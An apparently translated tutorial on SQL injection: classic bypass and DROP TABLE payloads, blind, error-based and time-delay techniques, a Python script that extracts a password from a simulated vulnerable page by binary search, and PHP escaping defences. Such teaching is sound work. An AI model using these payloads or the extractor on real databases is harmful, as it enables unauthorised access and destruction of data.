1. Escape characters are not filtered correctly
This form of injection occurs when user input is not filtered for escape characters before it is passed into an SQL statement. The result is that the end user of the application can run statements of their own choosing against the database. For example, the following line of code demonstrates the vulnerability:
    "SELECT * FROM users WHERE name = '" + userName + "';"
This code is intended to pull one particular user out of the users table, but if a malicious user crafts the user name in a particular way, the statement may do more than the code's author intended. For example, if the userName variable is set to: a' OR 't'='t, the original statement becomes:
    SELECT * FROM users WHERE name = 'a' OR 't'='t';
If this code is used in an authentication process, the example forces the query to return rows regardless of the user name supplied, because the condition 't'='t' is always true.
On some database servers, such as Microsoft SQL Server, any SQL command can be injected through this method, including several statements executed as one batch. The following value of userName deletes the users table and then selects all rows from the "data" table (which in effect reveals every user's information):
    a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%
This makes the final SQL statement:
    SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';
Other SQL implementations do not allow multiple statements in the same query, as a security measure. This prevents an attacker from injecting a completely separate query, but it does not prevent them from modifying the query they are injected into.
2. Incorrect type handling
This form of attack occurs when a user-supplied field is not strongly typed, or type coercion is not enforced: a numeric field is used in an SQL statement and the programmer never checks that the user's input is actually a number. For example:
    "SELECT * FROM data WHERE id =" + a_variable + ";"
From this statement it is clear that the author expects a_variable to be a number corresponding to the "id" field. But if the end user supplies a string instead, no quote character needs to be escaped at all. For example, setting a_variable to: 1; DROP TABLE users deletes the users table from the database, because the SQL statement becomes:
    SELECT * FROM data WHERE id = 1; DROP TABLE users;
3. Vulnerabilities in the database server
Sometimes the vulnerability lies in the database server software or its client library, such as the character-encoding issue in MySQL's mysql_real_escape_string() function. That issue allowed a successful SQL injection when the escaping function and the server disagreed about the connection's character set: under a multibyte charset such as GBK, the backslash inserted before a quote can be consumed as the trailing byte of the preceding character, leaving the quote unescaped.
4. Blind SQL injection type attack
A so-called blind SQL injection attack occurs when a web application is vulnerable but the results of the injected query are not visible to the attacker. The vulnerable page might not display any data, but instead display different content depending on the result of a logical statement injected into the legitimate query. This attack is time-consuming, because a new statement must be carefully constructed for every byte that is recovered. But once the location of the vulnerability and of the target information are established, a tool such as Absinthe can automate the attack.
5. Conditional response
Note that there is a form of SQL injection that forces the database to evaluate a logical statement within an ordinary application page:
    SELECT booktitle FROM booklist WHERE bookid = 'ook14cd' AND 1=1
This produces the normal page, whereas the statement

    SELECT booktitle FROM booklist WHERE bookid = 'ook14cd' AND 1=2

may produce a different page when the site is vulnerable to SQL injection. Such an injection proves that blind SQL injection is possible, which lets the attacker design statements whose truth can be judged from the page, and so read the contents of a field in another table.
6. Conditional errors
This type of blind SQL injection forces the database to evaluate an expression that raises an error only when the WHERE clause is true, so the truth of the condition shows up as an SQL error. For example:
    SELECT 1/0 FROM users WHERE username = 'Ralph'
Obviously, if the user Ralph exists, the division by zero raises an error; if not, no row is evaluated and no error occurs. This only works on database servers that raise an error for division by zero rather than returning NULL.
7. Time delay
Time delay is a blind SQL injection in which, depending on the injected logic, the SQL engine is made to execute a long-running query or an explicit delay statement. The attacker measures the page load time to determine whether the injected condition was true.
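The following added example (not part of the original article, and not the Absinthe tool) automates the conditional-response technique of sections 4 and 5 against a simulated vulnerable page. The page only ever renders a book title or "not found", yet the attacker recovers a password from a different table one character at a time, binary-searching each character's code with SQLite's unicode() and substr() so that a character costs about eight requests rather than one per candidate value. The tables, rows and the secret are constructed here; the conditional-error and time-delay variants differ only in what the oracle() method observes (an error page or elapsed time instead of page content).

```python
import sqlite3


def make_db():
    """Constructed sample data: the page's booklist, plus a second table
    holding the secret the attacker is after."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE booklist (bookid TEXT, booktitle TEXT);
        INSERT INTO booklist VALUES ('ook14cd', 'SQL for Beginners');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Tr0ub4dor');
    """)
    return conn


def vulnerable_page(conn, bookid):
    """Simulated web page: splices bookid into the query and renders either a
    title or a generic 'not found' page. The query result itself is never shown."""
    sql = "SELECT booktitle FROM booklist WHERE bookid = '" + bookid + "'"
    row = conn.execute(sql).fetchone()
    return "<h1>%s</h1>" % row[0] if row else "<h1>Book not found</h1>"


class BlindExtractor:
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def oracle(self, condition):
        """Conditional response: True iff the injected condition keeps the normal page.
        Injected text: ook14cd' AND (<condition>) AND 'a'='a"""
        self.requests += 1
        page = vulnerable_page(self.conn, "ook14cd' AND (" + condition + ") AND 'a'='a")
        return "not found" not in page

    def extract(self, subquery, max_len=32):
        """Recover the single-row result of `subquery` using only yes/no answers.
        For each position, first ask whether a character exists there, then
        binary-search its code point over 0..127 (7 questions)."""
        recovered = ""
        for pos in range(1, max_len + 1):
            if not self.oracle("length((%s)) >= %d" % (subquery, pos)):
                break
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                    lo = mid + 1
                else:
                    hi = mid
            recovered += chr(lo)
        return recovered


if __name__ == "__main__":
    extractor = BlindExtractor(make_db())
    secret = extractor.extract("SELECT password FROM users WHERE username='admin'")
    print("recovered %r in %d requests" % (secret, extractor.requests))
```

The point of the binary search is the cost model from section 4: each character needs one existence check plus seven comparisons, so a nine-character password is recovered in 73 requests even though no request ever returns a byte of it directly.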
The above is only a rough classification of SQL injection attacks. Technically, today's SQL injection attackers are smarter and more systematic about finding vulnerable sites, and new attack methods have appeared. Attackers can use a variety of tools to speed up exploitation. Consider the Asprox Trojan, which spread mainly through a spam-sending botnet. Its operation can be described as follows: first, the Trojan is installed on a computer via a spam message sent from a controlled host; the infected computer then downloads a binary that, when started, uses a search engine to find vulnerable web sites whose forms are built with Microsoft's ASP technology. The search results form the list of targets for SQL injection attacks. The Trojan then launches SQL injection attacks against these sites, taking control of and defacing some of them. Users who visit these compromised sites are tricked into downloading malicious JavaScript code from another site. Finally, that code redirects the user to a third site hosting further malware, such as password-stealing Trojans.
Previously, we often warned or recommended that web application programmers test and patch their code, even though SQL injection vulnerabilities were thought unlikely to be discovered and exploited. More recently, attackers have found and maliciously exploited these vulnerabilities. Developers should therefore test their code more proactively before deploying software, and patch it as soon as new vulnerabilities appear.
For example, someone might use this method to get around the login window. If your user name and password query has this form:
    SELECT * FROM users WHERE username = {username} AND password = {password}

then a user can log in under any user name by supplying this password:

    ' OR '' = '

so that the MySQL query that validates the user name and password becomes:

    SELECT * FROM users WHERE username = 'anyuser' AND password = '' OR '' = ''
The query condition is always true, because an empty string is always equal to an empty string. As a result, the risk of MySQL injection is significant: attackers can see data that should require logging in. It is important to protect your site against injection. Fortunately, PHP can help us prevent injection attacks.
MySQL will return every row in the table and, depending on your program logic, this may log the attacker in as any user, since every row matches. Now, most of the time people have the magic_quotes_gpc option turned on (it was also PHP's default at the time), and this setting automatically adds backslashes to escape all ' (single quote), " (double quote), \ (backslash) and NUL characters. But it is not that simple, because not all dangerous characters are escaped by it. PHP has a function that escapes all the MySQL characters that could introduce extra SQL clauses: mysql_real_escape_string().
Be careful when using this function: if the magic_quotes_gpc option is on, calling mysql_real_escape_string() escapes the input a second time. The following function avoids this problem by first checking whether magic_quotes_gpc is on and only then deciding whether to call mysql_real_escape_string().
    <?php
    // Quote a variable so that it is safe to embed in a query
    function quote_smart($value)
    {
        $link = mysql_connect('mysql_host', 'mysql_user', 'mysql_password');

        // Undo the escaping magic_quotes_gpc already applied, if any
        if (get_magic_quotes_gpc()) {
            $value = stripslashes($value);
        }

        // Quote and escape everything that is not a number
        if (!is_numeric($value)) {
            $value = "'" . mysql_real_escape_string($value, $link) . "'";
        }

        return $value;
    }
    ?>
Note that the quote_smart() function quotes strings itself, so you do not need to add the quotes yourself.
Also note that because different character sets require different escaping, mysql_real_escape_string() needs a MySQL connection to know which one is in use, which is why a connection link is passed as the second parameter. If a connection to MySQL is already open (for example on the same machine), the parameter can be omitted and the last opened link is used; but if no connection exists, mysql_real_escape_string() fails and returns FALSE with a warning instead of an escaped string. Finally, magic_quotes_gpc was deprecated in PHP 5.3 and removed in PHP 5.4, and the mysql_* extension was removed in PHP 7; in current PHP the equivalent is mysqli_real_escape_string() or, better, prepared statements with bound parameters (mysqli or PDO), which avoid escaping altogether.